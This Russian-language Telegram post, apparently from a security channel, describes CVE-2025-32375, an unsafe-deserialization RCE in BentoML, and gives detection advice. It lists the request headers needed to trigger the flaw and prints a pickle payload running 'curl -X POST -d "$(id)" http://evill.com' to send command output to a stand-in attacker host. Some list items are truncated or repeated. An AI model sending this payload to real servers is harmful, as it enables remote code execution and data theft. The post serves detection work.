👀 Ответ приходит на удаленный сервер.
Рекомендации по детектированию
1️⃣ Проверяем, что запрос отправлен методом
2️⃣ Проверяем наличие всех заголовков;
3️⃣ Проверяем, что
4️⃣ Проверяем, что body является сериализованной строкой.
CVE-2025-32375 — уязвимость небезопасной десериализации в BentoML, позволяющая выполнить произвольный код на сервере.
Метрики
Base Score: 9.8, критический
CWE: CWE-502
Детали уязвимости
Атака происходит с использованием
POST-запроса. Для запуска цепочки, проводящей к небезопасной десериализации, в запросе нужен заголовок args-number, значение которого равно 1. Еще в запросе должны быть дополнительные заголовки:Content-Type — может принимать разные значения, например: application/vnd.bentoml.pickled, application/x-www-form-urlencoded, application/octet-stream;Payload-Container — значение NdarrayContainer или andasDataFrameContainer;Payload-Meta — значение в формате json {"format": "default"};Batch-Size — значение в формате int.Полезная нагрузка
Полезная нагрузка — это сериализованный объект:
\x80\x04\x95K\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c0curl -X POST -d "$(id)" http://evill.com\x94\x85\x94R\x94
При десериализации она отправит вывод команды
id на удаленный сервер evill.com.Пример эксплуатации
Рекомендации по детектированию
POST;args-number равен 1;Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍9❤🔥4🤔2👾1